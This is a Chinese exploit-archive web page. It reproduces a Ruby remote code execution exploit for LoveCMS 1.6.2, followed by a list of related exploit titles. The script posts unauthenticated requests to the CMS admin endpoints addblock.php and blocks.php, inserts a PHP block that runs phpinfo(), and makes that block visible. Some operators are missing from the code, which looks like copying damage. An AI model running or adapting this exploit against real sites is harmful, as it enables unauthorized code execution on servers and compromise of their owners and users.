手机
当前位置:查字典教程网 >网络安全 >Exploit >LoveCMS 1.6.2 Final Remote Code Execution Exploit
LoveCMS 1.6.2 Final Remote Code Execution Exploit
摘要:#!/usr/bin/ruby###ExploitbyPoMdaPiMp!##---------------------##pomdapim...

#!/usr/bin/ruby

#

## Exploit by PoMdaPiMp!

## ---------------------

## pomdapimp(at)gmail(dotcom)

##

## LoveCMS Exploit Series

## Episode 1: adding a side block

##

## Description: add some php into a block container

## on the side of the site. phpinfo() is called.

##

## Usage: ./LoveCMS_1_blocks.rb <host>

## Ex: ./LoveCMS_2_themes.rb http://site.com/lovecms/

##

## Tested on: lovecms_1.6.2_final (MacOS X, Xampp)

# require 'net/http'

require 'uri' @host = 'http://127.0.0.1/lovecms_1.6.2_final/lovecms/' @host = ARGV[0] if ARGV[0]

@host = @host[-1, 1].to_s != '/' ? '/' : '' if @host

# --

puts " LoveCMS Exploit Series. #1: Adding side blocks."

puts

puts " : Attacking host: " @host # --

# Insert a new block

res = Net::HTTP.post_form(URI.parse(@host 'system/admin/addblock.php'),

{'submit'=>'1', 'title'=>'H4Ck', 'content' => 'phpinfo();', 'type' => 'php'})

puts " :: Block inserted." # --

# Build post variable for next step

post_vars = {'submit' => 1}

(1..50).each do |id|

post_vars['position' id.to_s] = 1

post_vars['height' id.to_s] = 1

post_vars['visible' id.to_s] = 1

end

# Make the block visible

res = Net::HTTP.post_form(URI.parse('http://127.0.0.1/lovecms_1.6.2_final/lovecms/system/admin/blocks.php'), post_vars )

puts " :: Blocks displayed." # --

puts

puts " - Visit " @host

end

【LoveCMS 1.6.2 Final Remote Code Execution Exploit】相关文章:

WarFTP 1.65 (USER) Remote Buffer Overlow Exploit

LoveCMS 1.6.2 Final Update Settings Remote Exploit

Microsoft DNS Server (Dynamic DNS Updates) Remote Exploit

Wordpress Plugin Download Manager 0.2 Arbitrary File Upload Exploit

Friendly Technologies (fwRemoteCfg.dll) ActiveX Command Exec Exploit

Adobe Acrobat 9 ActiveX Remote Denial of Service Exploit

Yourownbux 4.0 (COOKIE) Authentication Bypass Exploit

Ultra Office ActiveX Control Remote Buffer Overflow Exploit

fuzzylime cms 3.01 (commrss.php) Remote Code Execution Exploit

Windows Media Encoder wmex.dll ActiveX BOF Exploit (MS08-053)

精品推荐
分类导航